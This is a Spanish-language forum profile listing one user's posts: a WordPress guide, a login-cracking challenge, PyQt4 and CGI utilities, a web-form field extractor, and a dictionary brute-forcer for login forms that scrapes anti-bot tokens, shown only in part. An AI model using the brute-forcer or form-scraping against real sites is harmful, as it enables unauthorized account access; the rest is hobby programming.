Últimos Temas de: 0x5d

Mostrar Temas
Páginas: 1 [2] 3 4 5 6

11	Programación / Desarrollo Web / [WordPress] ¿ Cómo añadir una entrada en WordPress 3.8.2 ?	en: 9 Abril 2014, 03:42 am
Hola nuevamente! Una vez instalado WordPress en nuestro servidor, no queda más que empezar a darle vida al Blog añadiendo entradas (Publicaciones). Al grano... Lo primero, debes ingresar en tu Panel de Administración (/wp-admin) , ahí encontrarás algo como esto Ahí, en el menú izquierdo encontrarás el enlace "Entradas" , al poner el mouse encima, te dará estas opciones Una vez ahí dentro creo que el panel es muy intuitivo, por lo que hay cosas que no es necesario desarrollar. Contamos con opciones para personalizar el formato de la entrada que estamos agregando: Más abajo el panel nos da 2 posibilidades respecto a la Categoría de nuestra entrada: Especificar la categoría de nuestra entrada, si no seleccionas alguna, por defecto quedará en "Sin categoría". Añadir una nueva categoría. Otra de las opciones que nos provee WordPress, es la posibilidad de añadir etiquetas a nuestra entrada. Es totalmente opcional ingresar algunas etiquetas, pero si lo recomiendan para ayudar al buscador interno a encontrar las cosas, por lo general son como las palabras claves. La imagen que añadas en esta sección será la que acompañe como recurso gráfico a la entrada. Si tienes alguna duda respecto al funcionamiento de alguna función al añadir entradas, puedes hacer la pregunta respondiendo a esta entrada. Con gusto será respondida Puedes compartir esta entrada en Twitter Fuente: http://miweb.in/como-anadir-una-entrada-en-wordpress-3-8-2/ Saludos, Javier.

12	Seguridad Informática / Desafíos - Wargames / ["Desafío"] Patrón. - 0x5d	en: 1 Abril 2014, 05:47 am
Hola, muy buenos días. Hace un rato hice un login tipo patrón de android (que visualmente no se asemeja mucho, pero bueeh), el que me parece muy seguro, su url es http://181.41.199.11/patron/ , quisiera proponer vulnerar el sistema para medir la fortaleza. Así posteriormente quizás poder desarrollarlo de forma grupal. Pista: Usuario: admin Saludos.

13	Sistemas Operativos / Windows / "Validar" Mi software	en: 4 Noviembre 2013, 04:19 am
Hola, muy buenos días. De antemano pedir disculpas si publico en la sección equivocada Al grano... He creado una aplicación en PyQT4 , la cuál logré convertir a .exe mediante el ya popular py2exe. ¿ Cuál es el problema ? Al dar un link de descarga y posteriormente ejecutar, dice Windows que la aplicación no es segura y pide confirmación para su ejecución... Como podría yo solucionar ese tema y hacer que al descargar el programa, no diga que la app no es segura ? El soft no es nada malicioso, de hecho es algo así como un buscador... Saludos!

Programación / Scripting / [Código-PyQT4] IconFinder - JaAViEr | 0x5d

en: 31 Octubre 2013, 12:01 pm

Hola, buen día !

Hoy navegando por la web "Daw-Labs", me topé con que el compañero WindHack creó una aplicación para buscar iconos en https://www.iconfinder.com . Intenté hacerlo igual visualmente, pero en PyQT4 (además me sirvió de práctica) espero os guste :

Código

# -*- coding: utf-8 -*-
# Autor: 0x5d | JaAViEr
# Twitter: @0x5d
 
from PyQt4 import QtGui, QtCore, QtWebKit
import sys
import urllib
import re
 
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        return s
 
 
class programa(QtGui.QWidget):
 
	def __init__(self, parent=None):
		QtGui.QWidget.__init__(self, parent)
		self.msg = QtGui.QMessageBox(self)
		self.msg.setWindowTitle(_fromUtf8("Información"))
		self.setWindowTitle(_fromUtf8('IconFinder PyQT4 Version | 0x5d'))
		self.resize(529, 440)
		self.input_busqueda = QtGui.QLineEdit(self)
		self.input_busqueda.setGeometry(10, 20, 371, 20)
		self.boton_buscar = QtGui.QPushButton("Buscar", self)
		self.boton_buscar.setGeometry(390, 10, 61, 41)
		self.boton_guardar = QtGui.QPushButton("Guardar", self)
		self.boton_guardar.setGeometry(455, 10, 61, 41)
		self.connect(self.boton_guardar, QtCore.SIGNAL("clicked()"), self.guardar)
		#TABLA ORDENADORA DE RESULTADOS
		self.tabla = QtGui.QTreeWidget(self)
		self.tabla.setGeometry(0, 195, 530, 246)
		self.tabla.headerItem().setText(0, "#")
		self.tabla.headerItem().setText(1, "Id.")
		self.tabla.headerItem().setText(2, _fromUtf8("Tamaño"))
		self.tabla.headerItem().setText(3, "Url")
		#FIN TABLA
		self.grupo_options = QtGui.QGroupBox(self)
		self.grupo_options.setGeometry(10, 47, 291, 101)
		self.icon_perpage_label = QtGui.QLabel(self.grupo_options)
		self.icon_perpage_label.setGeometry(20, 30, 90, 16)
		self.icons_perpage_spin = QtGui.QSpinBox(self.grupo_options)
		self.icons_perpage_spin.setGeometry(113, 27, 47, 22)
		self.icons_perpage_spin.setProperty("value", 20)
		self.minimum_size_label = QtGui.QLabel(self.grupo_options)
		self.minimum_size_label.setGeometry(20, 70, 100, 13)
		self.minimum_size_spin = QtGui.QSpinBox(self.grupo_options)
		self.minimum_size_spin.setMaximum(190)
		self.minimum_size_spin.setGeometry(113, 65, 47, 22)
		self.minimum_size_spin.setProperty("value", 16)
		self.maximum_size_label = QtGui.QLabel(self.grupo_options)
		self.maximum_size_label.setGeometry(170, 70, 70, 13)
		self.maximum_size_spin = QtGui.QSpinBox(self.grupo_options)
		self.maximum_size_spin.setGeometry(241, 67, 42, 22)
		self.maximum_size_spin.setMaximum(190)
		self.maximum_size_spin.setProperty("value", 40)
		self.grupo_preview = QtGui.QGroupBox(self)
		self.grupo_preview.setGeometry(320, 47, 201, 141)
		self.total_results_label = QtGui.QLabel(self)
		self.total_results_label.setGeometry(20, 145, 81, 21)
		self.total_results_label.setStyleSheet("font-weight: bold;")
		self.numero_results_label = QtGui.QLabel(self)
		self.numero_results_label.setGeometry(100, 145, 31, 21)
		self.numero_results_label.setStyleSheet("font-weight: bold;")
		self.viewing_page_label = QtGui.QLabel(self)
		self.viewing_page_label.setGeometry(132, 145, 91, 21)
		self.viewing_page_label.setStyleSheet("font-weight: bold;")
		self.number_vpage_label = QtGui.QLabel(self)
		self.number_vpage_label.setGeometry(190, 145, 51, 21)
		self.number_vpage_label.setStyleSheet("font-weight: bold;")
		self.go_page_label = QtGui.QLabel(_fromUtf8("Ir a página:"), self)
		self.go_page_label.setGeometry(20, 170, 71, 16)
		self.go_page_label.setStyleSheet("font-weight: bold;")
		self.go_page_spin = QtGui.QSpinBox(self)
		self.go_page_spin.setGeometry(89, 168, 42, 22)
 
		self.grupo_options.setTitle("Opciones")
		self.icon_perpage_label.setText(_fromUtf8("Iconos por página:"))
		self.minimum_size_label.setText(_fromUtf8("Tamaño mínimo    :"))
		self.maximum_size_label.setText(_fromUtf8("Tam. máximo:"))
		self.grupo_preview.setTitle("Prevista")
		self.total_results_label.setText("Resultados:")
		self.numero_results_label.setText("0")
		self.viewing_page_label.setText(_fromUtf8("| Página:"))
		self.number_vpage_label.setText("0")
		self.connect(self.boton_buscar, QtCore.SIGNAL("clicked()"), self.buscar)
		self.connect(self.tabla, QtCore.SIGNAL('itemClicked(QTreeWidgetItem*, int)'), self.ver_link)
		self.preview = QtWebKit.QWebView(self.grupo_preview)
		self.preview.setGeometry(6, 16, 191, 115)
#Twitter Logo
#		self.twitter = QtWebKit.QWebView(self)
#		self.twitter.setGeometry(280, 0, 121, 80)
#		self.twitter.setStyleSheet("background-color: transparent; ")
#		self.twitter.setHtml("<center><a href='#' onclick='window.open(\"http://www.google.cl\")'><img src='%s' width=53 height=53 border=0></a></center>" % ("https://cdn3.iconfinder.com/data/icons/follow-me/256/Twitter-64.png"))
		self.connect(self.input_busqueda, QtCore.SIGNAL("returnPressed()"), self.buscar)
		self.connect(self, QtCore.SIGNAL("closeEvent()"), self.close)
 
	def guardar(self):
		archivo = QtGui.QFileDialog.getSaveFileName(self,
                self.tr("Guardar Archivo"), ".")
		try:
			loader = urllib.urlopen(str(self.url)).read()
			file = open(archivo, "wb")
			file.write(loader)
			file.close()
			self.msg.setText(_fromUtf8("Tu archivo se guardó con éxito"))
		except:
			self.msg.setText(_fromUtf8("¡Tu archivo no se pudo guardar!"))
			pass
		self.msg.exec_()
	def ver_link(self, item, i):
		self.url = item.text(3)
		self.preview.setStyleSheet("background-color: transparent; ")
		self.preview.setHtml("<center><img src='%s'></center>" % self.url)
 
	def buscar(self):
		self.tabla.clear()
		q = str(self.input_busqueda.text())
		icons_perpage = self.icons_perpage_spin.value()
		min_size = self.minimum_size_spin.value()
		max_size = self.maximum_size_spin.value()
		page = self.go_page_spin.value()
		url = urllib.urlopen("https://www.iconfinder.com/xml/search/?q=%s&c=%s&min=%s&max=%s&p=%s&api_key=4c5b276337af418894c87590412e4e39" % (q, icons_perpage, min_size, max_size, page)).read()
		x = url.split("<icon>")
		id = []
		size = []
		image = []
		for d in x:
			for idx in re.findall("<id>(.+?)<\/id>", d):
				id.append(idx)
			for sizex in re.findall("<size>(.+?)<\/size>", d):
				size.append(sizex)
			for imagex in re.findall("<image>(.+?)<\/image>", d):
				image.append(imagex)
		count = 1;
		for i, idx, sizex, imagex in zip(range(len(id)), id, size, image):
			exec("item_%s = QtGui.QTreeWidgetItem(self.tabla)"%i)
			self.tabla.topLevelItem(i).setText(0, str(count))
			self.tabla.topLevelItem(i).setText(1, str(idx))
			self.tabla.topLevelItem(i).setText(2, str(sizex))
			self.tabla.topLevelItem(i).setText(3, str(imagex))
			count += 1
		self.number_vpage_label.setText(str(page))
		self.numero_results_label.setText(str(count-1))
 
app = QtGui.QApplication(sys.argv)
form = programa()
form.show()
app.exec_()

Programación / Scripting / [Código-PyQT4] Escaner de Puertos - JaAViEr | 0x5d

en: 31 Octubre 2013, 04:59 am

Hola !

Luego de meses o quizás año sin tocar la librería QT4 de Python, hoy me quise re-encantar con dicha lib. Ya se me olvidó todo, a tal punto que tuve que re-leer el mismo tutorial que hice hace un tiempo, pero viendo algunos códigos viejos que hice, ya recordé algo

...

(...) Sin embargo no traigo un graaaaaan código, solo es un Escaner de puertos, con algo de CSS :

Código

# -*- coding: utf-8 -*-
# self.setGeometry(X, Y, Width, Height)
 
from PyQt4 import QtGui, QtCore
import sys
import httplib
 
class programa(QtGui.QWidget):
 
	def __init__(self, parent=None):
 
		QtGui.QWidget.__init__(self, parent)
		self.setFixedSize(230, 110)
		self.setWindowTitle("Escaner de Puertos")
		self.setStyleSheet("background: #000;")
		# URL , LABEL URL
		self.url = QtGui.QLineEdit(self)
		self.url.setGeometry(27, 10, 200, 20)
		self.url.setStyleSheet("color: #fff; background: #000;")
		self.url_label = QtGui.QLabel("URL:", self)
		self.url_label.setStyleSheet("color: #fff;")
		self.url_label.setGeometry(3, 10, 25, 20)
		# PUERTO, LABEL PUERTO
		self.puerto = QtGui.QLineEdit(self)
		self.puerto.setGeometry(41, 35, 40, 20)
		self.puerto.setStyleSheet("color: #fff; font-weight: bold; background: #000;")
		self.puerto_label = QtGui.QLabel("Puerto:", self)
		self.puerto_label.setStyleSheet("color: #fff;")
		self.puerto_label.setGeometry(3, 36, 35, 20)
		# STATUS, LABEL STATUS
		self.status_label = QtGui.QLabel("Estado:", self)
		self.status_label.setStyleSheet("color: #fff;")
		self.status_label.setGeometry(3, 60, 50, 20)
		self.esperando = QtGui.QLabel("Esperando", self)
		self.esperando.setStyleSheet("color: red; font-weight: bold; background: #000;");
		self.esperando.setGeometry(44, 60, 100, 20)
		# BOTON 
		self.boton = QtGui.QPushButton("Scan!", self)
		self.boton.setStyleSheet("color: #fff; background: #000; border: 2px solid #fff;")
		self.boton.setGeometry(3, 85, 225, 20)
		self.connect(self.boton, QtCore.SIGNAL("clicked()"), self.scan)
 
	def scan(self):
		url = str(self.url.text())
		puerto = int(self.puerto.text())
		try:
			conn = httplib.HTTPConnection(url, puerto, timeout=2)
			BODY = "***filecontents***"
			conn.request("GET", "/", BODY)
			resp = conn.getresponse()
			if resp.status == 200:
				self.esperando.setStyleSheet("color: green; font-weight: bold")
				self.esperando.setText("%s Abierto" % puerto)
			conn.close()
		except:
				self.esperando.setStyleSheet("color: red; font-weight: bold")
				self.esperando.setText("%s Cerrado" % puerto)
app = QtGui.QApplication(sys.argv)
form = programa()
form.show()
app.exec_()

Saludos !

16	Programación / Scripting / Ruby + GTK	en: 2 Agosto 2013, 12:07 pm
Hola, buen día a todos. Decidí incursionar en Ruby, pues vengo de Python y se me hizo fácil la migración, incluso encuentro más simple ruby en eso de las REGEX, en fin, voy al grano... En PyQT4 cuando yo creaba un objeto, lo ubicaba según X e Y además le daba las dimensiones al objeto, todo estoy con objecto.setGeometry() , entonces mi duda es ... ¿ Cuál es el equivalente de setGeometry en Ruby GTK ? Saludos, Javier.

17	Programación / Scripting / [Proyecto]PyDB - "Bases de Datos" fáciles en Python :: JaAViEr \| 0x5d	en: 23 Julio 2013, 14:35 pm
Hola, muy buenos días ! En esta oportunidad vengo a presentar un mini proyecto que estoy iniciando con mucho entusiasmo, espero algunas personas se animen y ayuden a expandir este módulo ! . Sin más preámbulos... ¿ Qué es PyDB ? PyDB es un módulo que te ayudará a crear Bases de Datos a partir de archivos de texto, siempre y cuando estos archivos contengan una estructura legible para PyDB ¿ Dónde descargo el módulo ? El enlace para descargar el módulo es PyDB - SourceForge En el mismo README.txt está la documentación de cada función del PyDB, como se utilizan y los parámetros que le deben pasar a cada función. Funciones : Añadir valor. (En SQL -> INSERT INTO) Eliminar valor. (En SQL -> DELETE FROM tabla WHERE columna=valor) Actualizar valor (En SQL -> UPDATE) Ver Tabla. Consultar valor (En SQL -> SELECT campo FROM tabla) Ver columnas de tabla . ¿ Cuál es la estrucutra de la Base de Datos ? Base_Datos.Txt : Código: Tabla(columna1, columna2){ columna1=Contenido columna1; columna2=Contenido columna2; } Personas(nombre, edad, correo){ nombre=Javier Guajardo; edad=19; correo=javier.guajardo@vodale.com; nombre=Juan Andres; edad=25; correo=contacto@dominio.com; } Ejemplo de login con PyDB , disponible para la descarga en Ejemplo PyDB - SourceForge Nota: Recuerda tener el módulo db.py en la misma carpeta de donde invocarás el archivo. Espero sus más sinceras opiniones ! Saludos, Javier.

Programación / Scripting / Tools Python CGI + Source | JaAViEr::0x5d

en: 24 Abril 2013, 15:55 pm

Hola, buen día damas y caballeros

.

En esta ocasión vengo a mostrar el código de fuente de unas aplicaciones que pasé a Python CGI , para poder ejecutarlas en el servidor y no depender de una maquina con Python instalado...

Sin más preámbulos, los enlaces son los siguientes:

Sus respectivos códigos de fuente...
De/Codificador Base64:

Código

#!/usr/bin/python
#Autor: 0x5d::JaAViEr
#Twitter: @0x5d
import cgi, os, base64
 
def form_inicial():
	form_html = '''
	<form action="" method="POST">
		<textarea name="content"></textarea><br />
		<select name="option">
			<option value="encode">Codificar</option>
			<option value="decode">Decodificar</option>
		</select><br />
		<input type="Submit" value="Enviar"><br />
		Creado bajo Python CGI.<br />
		Autor : JaAViEr (0x5d)
	</form>'''
	return base("De/Codificar Base64", form_html)
 
def base(title, content):
	code = '''
	<div class="ui-widget-content">
<div class="ui-widget-header">%s</div>
%s
</div>
'''%(title, content)
	return code
 
print "content-type:text/html\r\n\r\n"
 
print '''
<title>De/Codificador Base64</title>
<script src="http://code.jquery.com/jquery-latest.js"></script>
<link rel="stylesheet" href="http://code.jquery.com/ui/1.9.1/themes/cupertino/jquery-ui.css" />
<script src="http://code.jquery.com/ui/1.9.1/jquery-ui.js"></script>
<link rel="stylesheet" href="http://jqueryui.com/resources/demos/style.css" />
<style>
div {
	text-align:center;
	font-size:0.5cm;
	}
input, select {
	height:0.7cm;
	font-size:0.4cm;
}
</style>
'''
 
form = cgi.FieldStorage()
opcion = form.getvalue("option")
texto = form.getvalue("content")
method = os.environ['REQUEST_METHOD']
if method == "POST":
	if opcion:
		if opcion == "encode":
			print form_inicial()
			print base("Salida", "<textarea>"+cgi.escape(base64.b64encode(texto))+"</textarea>")
		elif opcion == "decode":
			print form_inicial()
			print base("Salida", "<textarea>"+cgi.escape(base64.b64decode(texto))+"</textarea>")
		else:
			print form_inicial()
			print base("Error", "Opción incorrecta")
	else:
		print form_inicial()
		print base("Error", "Por favor selecciona una opción")
else:
	print form_inicial()

Cifrar Rot13 / Atbash:

Código

#!/usr/bin/python
#Autor: 11Sep
#To CGI: 0x5d::JaAViEr
#Twitter: @0x5d
import cgi, os
 
def  formulario_inicial():
	form_html = '''
	<form action="" method="POST">
	Data: <br/>
	<textarea name="contenido"></textarea><br />
	<select name="opcion">
	<option value="rot13">ROT13</option>
	<option value="atbash">Atbash</option>
	</select><br />
	<input type="Submit"><br/>
	Programado por <b>11Sep</b><br />
	Programado en CGI por <b>JaAViEr::0x5d</b>
	</form>
	'''
	return base("Cifrar Rot13/Atbash", form_html)
 
def base(title, content):
	code = '''
	<div class="ui-widget-content">
<div class="ui-widget-header">%s</div>
%s
</div>
'''%(title, content)
	return code
 
def rot13(palabra):
    Cifrado = ''
    for i in palabra:
        buff = ord(i)
        if (buff >= 65 and buff <= 90) or (buff >= 97 and buff <= 122):
            if ((buff + 13 > 90 and buff + 13 <= 103) or (buff + 13 > 122 and buff + 13 <= 135)):
                Cifrado += chr(buff -13)
            else:
                Cifrado += chr(buff + 13)
    return Cifrado
 
def atbash(palabra):
    V1 = "abcdefghijklm"
    V2 = "zyxwvutsrqpon"
 
    Buff = ""
 
    for i in range(len(palabra)):
        for a in range(len(V1)):
            if V1[a] == palabra[i]:
                Buff += V2[a]
            elif V2[a] == palabra[i]:
                Buff += V1[a]
    return Buff
 
print "content-type:text/html\r\n\r\n"
print '''
<title>Cifrar Rot13/Atbash 11Sep::JaAViEr</title>
<script src="http://code.jquery.com/jquery-latest.js"></script>
<link rel="stylesheet" href="http://code.jquery.com/ui/1.9.1/themes/blitzer/jquery-ui.css" />
<script src="http://code.jquery.com/ui/1.9.1/jquery-ui.js"></script>
<link rel="stylesheet" href="http://jqueryui.com/resources/demos/style.css" />
<style>
div {
	text-align:center;
	font-size:0.5cm;
	}
input, select {
	height:0.7cm;
	font-size:0.4cm;
}
</style>
'''
form = cgi.FieldStorage()
method = os.environ['REQUEST_METHOD']
contenido = form.getvalue("contenido")
opcion = form.getvalue("opcion")
if method == "POST":
	if opcion:
		if opcion == "rot13":
			print formulario_inicial()
			print base("Salida", "<textarea>"+rot13(contenido)+"</textarea>")
		elif opcion == "atbash":
			print formulario_inicial()
			print base("Salida", "<textarea>"+atbash(contenido)+"</textarea>")
		else:
			print formulario_inicial()
			print base("ERROR","Opción inválida")
else:
	print formulario_inicial()

Enviar peticiones POST:

Código

#!/usr/bin/python
#Autor: 0x5d::JaAViEr
#Twitter: @0x5d
import cgi, os, urllib, sys
 
def base(title, content):
	code = '''
	<div class="ui-widget-content">
<div class="ui-widget-header">%s</div>
%s
</div>
'''%(title, content)
	return code
 
print "content-type:text/html\r\n\r\n"
print '''
<title>Enviar datos POST online :: JaAViEr(0x5d)</title>
<script src="http://code.jquery.com/jquery-latest.js"></script>
<link rel="stylesheet" href="http://code.jquery.com/ui/1.9.1/themes/cupertino/jquery-ui.css" />
<script src="http://code.jquery.com/ui/1.9.1/jquery-ui.js"></script>
<link rel="stylesheet" href="http://jqueryui.com/resources/demos/style.css" />
<style>
div {
	text-align:center;
	font-size:0.5cm;
	}
input, select {
	height:0.7cm;
	font-size:0.4cm;
}
</style>
'''
form = cgi.FieldStorage()
method = os.environ['REQUEST_METHOD']
campos = form.getvalue("campos")
valores = form.getvalue("valores")
url = form.getvalue("url")
if method == "POST":
	dic = {}
	if not "http://" in url:
	  print base("ERROR!","No se puede conectar a %s<br/><a href='send_post.py'>Volver</a>"%cgi.escape(url))
	  sys.exit(1)
	if len(campos)>0 and len(valores)>0:
		for d,i in zip(campos.split(),valores.split(":-:")):
			dic['%s'%d] = i
		try:
			print urllib.urlopen(url, urllib.urlencode(dic)).read()
		except:
			print "No se puede conectar a", cgi.escape(url)
else:
	form_html = '''
	<form action="" method="POST">
	URL: <input type="Text" name="url" value="http://"><br />
	Campos (separados por un espacio): <input type="Text" name="campos"><br />
	Campos (separados por ":-:"): <input type="Text" name="valores"><br />
	<input type="Submit"><br/>
	Funcionando bajo Python CGI<br />
	Author: <u>JaAViEr::0x5d</u>
	</form>
	'''
	print base("ENVIAR DATOS POR POST", form_html)
	form_example = '''
	URL: <input type="Text" name="url" value="http://web.com/login.php" disabled><br />
	Campos (separados por un espacio): <input type="Text" name="campos" value="user password" disabled><br />
	Campos (separados por ":-:"): <input type="Text" name="valores" value="0x5d:-:miclave123" disabled><br />
	<input type="Submit" onclick=alert("TEST");><br/>
	'''
	print base("Ejemplo de uso", form_example)

Fuente: http://www.vodale.com/blog/tools-python-cgi-source-jaavier0x5d/

Saludos , Javier.

Programación / Scripting / [Código-Python]Extractor de formularios+sus propiedades+Inputs - JaAViEr (0x5d)

en: 21 Marzo 2013, 16:59 pm

Hola, muy buen día a todos.

Volviendo a las canchas con Python, os traigo un detector de formularios, con las siguientes características :

Lee las urls dentro de un archivo de texto. Separando las url's por un ENTER
El programa detecta todos los formularios de las webs
Nos entregará propiedades del <form> , tipo "method", "name", "id", "onsubmit", etc
Devuelve los campos input de cada formulario, junto a sus propiedades, tipo "name", "value", "type", "id", "class", etc

Sin más preámbulos... El código :

Código

# Autor : 0x5d - JaAViEr
# Twitter : @0x5d
import sys, urllib2, re
try:
	urls = open(raw_input("Archivo ::> "), "r")
except:
	print "Error al intentar abrir el archivo."
	sys.exit(1)
for a in urls:
	web = urllib2.urlopen(a).read()
	busca_form = re.findall("<form(.*)>", web)
	for b in busca_form:
		url_action = re.findall("action=(.*)", b)[0].split()[0].translate(None, "><\"'").replace("&amp;","&")
		if len(url_action) == 0:
			url_action = a.replace("&amp;","&")
		print "\n\nURL:", url_action
		print "\nPropiedades del <form>:"
		formularios = web.split("<form")
		f = 0
		for c, d  in zip(b.split(), formularios):
			propiedades = re.findall("(.*)=\"(.*)\"", c)
			if propiedades and not "action" in propiedades[0][0]:
				print propiedades[0][0], ":", propiedades[0][1]
			inputs = re.findall("<input(.*)", web.split("<form")[f].split("</form>")[0])
			f += 1
		print "-"*20
		for g in inputs:
			print "<INPUT>:"
			for h in g.split():
				propiedades_input = re.findall("(.*)=(.*)", h)
				if propiedades_input and len(propiedades_input[0][0])>0:
					print propiedades_input[0][0], ":", propiedades_input[0][1].split(">")[0]
					print "-"*20

Ejemplo de archivo urls.txt:

Código

http://www.vodale.com/chat_xxx/login.php

Ojo que pueden poner muchas url's hacia abajo

Salida:

Código

Archivo ::> urls.txt
 
 
URL: http://www.vodale.com/chat_xxx/login.php
 
Propiedades del <form>:
method : POST
--------------------
<INPUT>:
type : "text"
--------------------
name : "log"
--------------------
<INPUT>:
type : "text"
--------------------
name : pwd
--------------------
<INPUT>:
type : "Submit"
--------------------
value : "Login"
--------------------

Como ven, dice <INPUT> y abajo la propiedad de cada input.
Un ejemplo con la salida de un SMF...
urls.txt

Código

http://www.portalhacker.net/index.php?action=login

Salida:

Código

 
Archivo ::> urls.rxr
 
 
URL: http://www.portalhacker.net/index.php?PHPSESSID=17d1201149f3def8b534505196245624&action=login2
 
Propiedades del <form>:
id : guest_form
method : post
accept-charset : UTF-8
--------------------
<INPUT>:
type : "text"
--------------------
name : "user"
--------------------
size : "20"
--------------------
value : ""
--------------------
class : "input_text"
--------------------
<INPUT>:
type : "password"
--------------------
name : "passwrd"
--------------------
value : ""
--------------------
size : "20"
--------------------
class : "input_password"
--------------------
<INPUT>:
type : "text"
--------------------
name : "cookielength"
--------------------
size : "4"
--------------------
maxlength : "4"
--------------------
value : "90000"
--------------------
class : "input_text"
--------------------
<INPUT>:
type : "checkbox"
--------------------
name : "cookieneverexp"
--------------------
class : "input_check"
--------------------
onclick : "this.form.cookielength.disabled
--------------------
<INPUT>:
type : "submit"
--------------------
value : "Ingresar"
--------------------
class : "button_submit"
--------------------
<INPUT>:
type : "hidden"
--------------------
name : "hash_passwrd"
--------------------
value : ""
--------------------
 
 
URL: http://www.portalhacker.net/index.php?PHPSESSID=17d1201149f3def8b534505196245624&action=search2
 
Propiedades del <form>:
method : post
accept-charset : UTF-8
--------------------
<INPUT>:
type : "text"
--------------------
name : "search"
--------------------
class : "inputbox"
--------------------
value : "Buscar..."
--------------------
onfocus : "this.value
--------------------
onblur="if(this.value= : '')
--------------------
this.value : 'Buscar...';"
--------------------
<INPUT>:
type : "hidden"
--------------------
name : "advanced"
--------------------
value : "0"
--------------------
 
 
URL: http://www.portalhacker.net/index.php?PHPSESSID=17d1201149f3def8b534505196245624&action=login2
 
Propiedades del <form>:
name : frmLogin
id : frmLogin
method : post
--------------------
<INPUT>:
type : "text"
--------------------
name : "user"
--------------------
size : "20"
--------------------
value : ""
--------------------
class : "input_text"
--------------------
<INPUT>:
type : "password"
--------------------
name : "passwrd"
--------------------
value : ""
--------------------
size : "20"
--------------------
class : "input_password"
--------------------
<INPUT>:
type : "text"
--------------------
name : "cookielength"
--------------------
size : "4"
--------------------
maxlength : "4"
--------------------
value : "90000"
--------------------
class : "input_text"
--------------------
<INPUT>:
type : "checkbox"
--------------------
name : "cookieneverexp"
--------------------
class : "input_check"
--------------------
onclick : "this.form.cookielength.disabled
--------------------
<INPUT>:
type : "submit"
--------------------
value : "Ingresar"
--------------------
class : "button_submit"
--------------------
<INPUT>:
type : "hidden"
--------------------
name : "hash_passwrd"
--------------------
value : ""
--------------------

Ahí se aprecia mejor la salida de las propiedades del <form>

Lo hice con un poco de inspiración

, sé que nadie va a comentar , pero igual lo dejo por acá , quizás a alguien le llegue a servir el bichito

Saludos , Javier.

Programación / Scripting / [Código-Python]Bruteforce logins - JaAViEr (0000x5d)

en: 20 Marzo 2013, 21:31 pm

¡ Hola, buen día !

Hace meses que no programaba, entre viajes, no había donde ni como programar... Y hoy por la mañana me entusiasmé y me puse a codear un BruteForce para algunos formularios que son "débiles". El funcionamiento es el típico ... Solo que tiene algo que lo hace un poco (por no decir "NADA") diferente. Le añadí la opción de extraer tokens que usualmente utilizan para seguridad anti-bots (lo que deja demostrado que siguen siendo inútiles los tokens

). Sin más preámbulos, os enseñaré como utilizarlo .

Al correr el Python en cuestión , nos dirá "Se necesita token ?(s/n): "
Si el formulario que ustedes van a atacar, funciona con el sistemita ese de los tokens, entonces denle "s" o "S" y enter ... De ser así, os pedirá el nombre del campo del token que se envía , para así el programa buscarlo y poder enviarlo en cada petición...

De lo contrario, simplemente pongan n o N y al siguiente paso...

El siguiente es el vital y el que nos permitirá saber cuando nuestro login es válido ... Mensaje de error .

¿ Cómo saber dicho mensaje ?

Van al formulario, ingresan un usuario y contraseña incorrectos. Les devolverá algo tipo : "Credenciales inválidas", "Usuario o contraseña incorrectos", "Error al ingresar", ETC

Entonces nosotros tomamos una palabrita de ellas, "Error" o "incorrectos" o el que les salga a ustedes. Este mensaje es el que nos ayudará a ver que nuestro usuario & contraseña funcionen.

Posteriormente, el programa nos dirá "Campo user: " , que es el nombre del Input que envía el formulario , por ejemplo <input type="text" name="user"> , entonces ingresan "user".

Luego, "Campo password: ". Vamos al source y buscamos el type="password" , miramos su propiedad name (por ejemplo <input type="password" name="clave"> e ingresamos "clave" en el programa.

Seguido de eso, nos pedirá un "Archivo(Diccionario): " Que es con el diccionario que atacaremos el formulario, ahí ingresas la ruta de vuestro diccionario.

Y como ultima cosa, nos preguntará ... Campos adicionales ?(s/n)

Por si envía algún dato en hidden el formulario. La manera de insertar el campo es la siguiente:
NAME VALUE

Código:

Data:redirect_to /wp-admin
Data:remember_me 1

Que sería el equivalente a

Código

<input type="hidden" name="redirect_to" value="/wp-admin">
<input type="hidden" name="remember_me" value="1">

Luego dirá "Data:" y para correr el bruteforce, tipeamos "//brute" y paff , buscará el login correcto.

Código

# Autor   : 0x5d || JaAViEr
# Twitter : @0x5D
 
import urllib
import sys
import re
import urllib2
 
class brute:
 
	def __init__(self):
 
 
		self.nombre_token = ""
		self.valor_token = ""
		self.actualizar_formulario = ""
		global formulario
		formulario = {}		
		self.buscar_hash = raw_input("Se necesita token ?(s/n): ")  
		self.buscar_hash = True if self.buscar_hash.lower() == "s" else False
		self.url_form = "" # URL donde se encuentra el formulario
		if self.buscar_hash:
			if self.extraer_token():
				print "Token FOUND"
			else:
				print "Token Not Found :( "
		self.url_to_post = "" # URL donde se envia el formulario
		self.mensaje_error = raw_input("Mensaje de Error: ") # Mensaje de error, para detectar un login correcto
		self.campo_usuario = raw_input("Campo user: ") # Nombre del campo (input) del usuario
		self.campo_password = raw_input("Campo password: ") # Nombre del campo (input) del password				
		self.archivo_diccionario = raw_input("Archivo(Diccionario): ") # Archivo con Diccionario
		self.datos_adicionales = raw_input("Campos adicionales? (s/n): ")
		self.respuesta_adicionales = True if self.datos_adicionales.lower() == "s" else False
		self.estado_token = True 
		if self.respuesta_adicionales:
			self.agregar_campos()
		self.bruteforce()
 
	def agregar_campos(self):
		formulario = {}
		while self.respuesta_adicionales:
			data = raw_input('Data: ')
			parse_data = data.split(" ")
			if data != "//brute":
				formulario.update({parse_data[0]:parse_data[1]})
				print formulario
			else:
				break
 
	def extraer_token(self):
 
		estado_token = True
		if len(self.nombre_token)<=0:
			self.nombre_token = raw_input("Nombre del token: ")
		while estado_token:
			try:
				buscar = urllib2.urlopen(self.url_form)
				if self.nombre_token in buscar.read():
 
					estado_token = False
					buscar_token = urllib2.urlopen(self.url_form)
					found = re.findall("name=\"%s\" (.*)"%self.nombre_token, buscar_token.read())	
					if len(found)>0:
 
						for i in range(len(found)):
 
							if "value=\"" in found[i]:
								self.split_token = re.findall("value=\"(.*)\"", found[i])
								self.valor_token = self.split_token[0]
								return True
							else:		
								return False
					else:
						return False
				else:
					return False
			except:
				return False
 
	def bruteforce(self):
		cookie = urllib2.HTTPCookieProcessor()
		opener = urllib2.build_opener(cookie)
		urllib2.install_opener(opener)
		estado_archivo = True
		while estado_archivo:
			try:
				cargar_diccionario = open(self.archivo_diccionario, "r")
				separar_datos = cargar_diccionario.read().split("\n")
				estado_archivo = False
			except:
				print "No se encuentra el archivo mencionado"
				self.archivo_diccionario = raw_input("Archivo(Diccionario): ") 
		print "Buscando el login correcto ..."
